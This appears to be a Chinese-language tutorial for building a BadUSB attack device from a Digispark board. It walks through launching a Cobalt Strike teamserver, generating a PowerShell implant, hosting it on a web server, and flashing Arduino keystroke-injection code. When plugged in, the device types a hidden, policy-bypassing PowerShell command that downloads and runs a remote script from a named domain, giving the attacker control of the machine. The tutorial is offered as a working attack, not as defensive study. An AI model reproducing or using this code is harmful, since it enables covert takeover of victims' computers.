使用digispark制作一个BadUSB

0X00、工具准备

digispark开发板。

淘宝连接：https://m.tb.cn/h.VK7vwjy?sm=d85844

0X01、安装Arduino IDE环境

1、安装 arduino 的 IDE。

下载地址：https://www.arduino.cc/en/Main/Software

新版下载：https://downloads.arduino.cc/arduino-1.8.3-windows.zip

2、下载驱动

链接：http://pan.baidu.com/s/1i4K10dn 密码：ilaf

3、驱动安装

如果是 64 位操作系统请选择 DPinst64.exe，否则请选择 DPinst.exe.

4、配置环境

点击文件--首选项

附加开发板管理器网址：http://digistump.com/package_digistump_index.json

点击工具--开发板管理器

等待下载完成，下载可能需要挂国外代理。

找到这个进行安装

安装完成后开发板选择这个

0X02、使用CobaltStrike生成木马

1、启动CS

服务器：

通过screen启动cs服务端

screen
./teamserver 129.204.113.202 admin888

ctrl + a+d 将当前程序放到后台。

客户端启动

java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar

客户端连接

2、生成木马

配置监听器：

使用CS生成powershell的脚本。

保存到桌面

3、放到远程服务器备用

将脚本上传到HTTP服务器备用

0X03、BadUsb制作

代码如下：

#include "DigiKeyboard.h"
#define KEY_ESC     41
#define KEY_BACKSPACE 42
#define KEY_TAB     43
#define KEY_PRT_SCR 70
#define KEY_DELETE  76

void setup() {

DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(3000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://qianxiao996.cn/badusb.ps1');"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(750);
DigiKeyboard.sendKeyStroke(KEY_ENTER);

}
void loop() {
}

功能是下载打开windwos+r 运行窗口，输入命令执行。

点击上传，在60s之内插入你的badusb。

上传成功。

插哪哪上线！

0X04、参考链接

https://mp.weixin.qq.com/s/3lkdXK_g-_xcf378FNly1A

https://mp.weixin.qq.com/s/UROx1fJOmMVbmH_-UasFEQ